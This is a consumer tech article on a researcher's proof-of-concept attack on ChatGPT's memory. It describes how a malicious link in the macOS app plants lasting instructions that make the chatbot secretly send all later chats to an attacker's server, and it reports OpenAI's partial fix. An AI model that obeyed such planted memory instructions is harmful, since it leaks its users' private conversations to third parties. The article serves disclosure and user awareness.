As a longtime ChatGPT user, I want AI chatbots to be very secure and private. That is, I want the contents of my chats to be protected from would-be attackers and from OpenAI itself. OpenAI can of course use chats to train future models if you allow it, but I don’t.
While I have to trust that OpenAI handles the security and privacy aspects of the ChatGPT experience, I also know that other ChatGPT enthusiasts will test everything that’s possible with the chatbot. In the process, they can potentially identify serious security issues.
Such is the case with security researcher Johann Rehberger, who developed a way to exploit the ChatGPT memory feature to exfiltrate user data. The hacker fed a prompt to ChatGPT that wrote permanent instructions to the chatbot’s memory, including directions to steal all user data from new chats and send the information to a server.
That sounds scary, and it is. It’s also not as dangerous as it might seem at first because there are several big twists. And before I even describe the exploit, you should also know that OpenAI has already fixed it.
For the exploit to work, hackers would have to convince you to click a malicious link to kickstart the process. That’s the step involved in plenty of other hacks that have nothing to do with generative AI chatbots: Convincing the target to click on a link.
Assuming the hackers convinced you to load a link in ChatGPT, the chatbot’s memory can be written with a prompt that tells the AI how to exfiltrate information from all the chats that would follow. However, the prompt injection only works if you use the macOS version of ChatGPT. ChatGPT’s memory can’t be affected if you use the website.
Assuming you click on the malicious link and you have the Mac app, you can instruct ChatGPT to explain what it is about, as you’ll see in the proof-of-concept video at the end of this post. ChatGPT will most likely fail to identify that it’s now spying on your chats for a third party. Here’s the final twist: You still control the memory.
OpenAI introduced the ChatGPT memory feature earlier this year to improve your conversations with ChatGPT. You can instruct the chatbot to remember certain things. But you’re in control. You can also tell the AI to forget something or just erase the entire memory. The feature is optional, so you can also deactivate it.
If you think hackers might have messed with your ChatGPT’s memory, you can always check and delete anything you want. Once that’s done, the chatbot will stop sending your conversations to an attacker, the scenario that Rehberger demonstrated.
According to Ars Technica, Rehberger reported the ChatGPT vulnerability to OpenAI earlier this year. The company labeled it a safety issue initially, not a security concern. The security researcher went further to create the proof-of-concept in the video below. This time, OpenAI engineers paid attention and issued a partial fix.
OpenAI made it impossible for ChatGPT memories to be abused as an exfiltration vector. Attackers won’t be able to steal the contents of your chats after duping you into clicking on a malicious link. However, the ChatGPT hack still proves that some attackers might try to inject memories into the ChatGPT conversations of unsuspecting users.
In the future, you should periodically review the ChatGPT memory feature to ensure that the chatbot only remembers what you want.
The video below shows Rehberger’s attack in action. More information about this ChatGPT memory hack is available on Rehberger’s blog at this link.